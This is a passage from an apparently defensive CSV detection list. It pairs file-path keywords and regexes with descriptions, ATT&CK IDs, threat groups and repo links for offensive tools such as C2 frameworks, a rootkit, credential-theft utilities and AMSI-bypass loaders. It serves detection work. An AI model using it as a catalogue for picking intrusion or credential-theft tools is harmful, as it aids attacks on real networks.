fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.5_Anysharpfiles.exe*",".{0,1000}\/net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.7_32_RunasCs.exe*",".{0,1000}\/net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.7_64_RunasCs.exe*",".{0,1000}\/net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_4.7_Any_RunasCs.exe*",".{0,1000}\/net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/net_portscan.py*",".{0,1000}\/net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/net_recon/*",".{0,1000}\/net_recon\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/net_sniff.*",".{0,1000}\/net_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/net_sniff_*.*",".{0,1000}\/net_sniff_.{0,1000}\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/NETAMSI.ps1*",".{0,1000}\/NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/netbus-auth-bypass.nse*",".{0,1000}\/netbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-brute.nse*",".{0,1000}\/netbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-info.nse*",".{0,1000}\/netbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-version.nse*",".{0,1000}\/netbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NetClone.exe*",".{0,1000}\/NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/netcreds.py*",".{0,1000}\/netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/NetExec.git*",".{0,1000}\/NetExec\.git.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/netexec.py*",".{0,1000}\/netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the 
security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/NetExec-main*",".{0,1000}\/NetExec\-main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Net-GPPPassword.git*",".{0,1000}\/Net\-GPPPassword\.git.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*/nethunter-images/*",".{0,1000}\/nethunter\-images\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/netkit.git*",".{0,1000}\/netkit\.git.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*/netkit/client/shell.py*",".{0,1000}\/netkit\/client\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*/netkit/src/netkit.*",".{0,1000}\/netkit\/src\/netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*/NetLoader.git*",".{0,1000}\/NetLoader\.git.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense 
Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*/netntlm.pl*",".{0,1000}\/netntlm\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/NetNTLMtoSilverTicket*",".{0,1000}\/NetNTLMtoSilverTicket.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/NetshHelperBeacon.git*",".{0,1000}\/NetshHelperBeacon\.git.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*/netsparker.rb*",".{0,1000}\/netsparker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/netstat_windows.go*",".{0,1000}\/netstat_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/nettitude/*",".{0,1000}\/nettitude\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/nettitude/RunOF/*",".{0,1000}\/nettitude\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/NetUser.cpp*",".{0,1000}\/NetUser\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*/NetUser.exe*",".{0,1000}\/NetUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*/netuserenum/*",".{0,1000}\/netuserenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*/network/bloodhound3*",".{0,1000}\/network\/bloodhound3.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Network/PortScan/*",".{0,1000}\/Network\/PortScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/NewPhish.ps1*",".{0,1000}\/NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/nexpose-brute.nse*",".{0,1000}\/nexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nfs-ls.nse*",".{0,1000}\/nfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nfs-showmount.nse*",".{0,1000}\/nfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nfs-statfs.nse*",".{0,1000}\/nfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nginxed-root.sh*",".{0,1000}\/nginxed\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 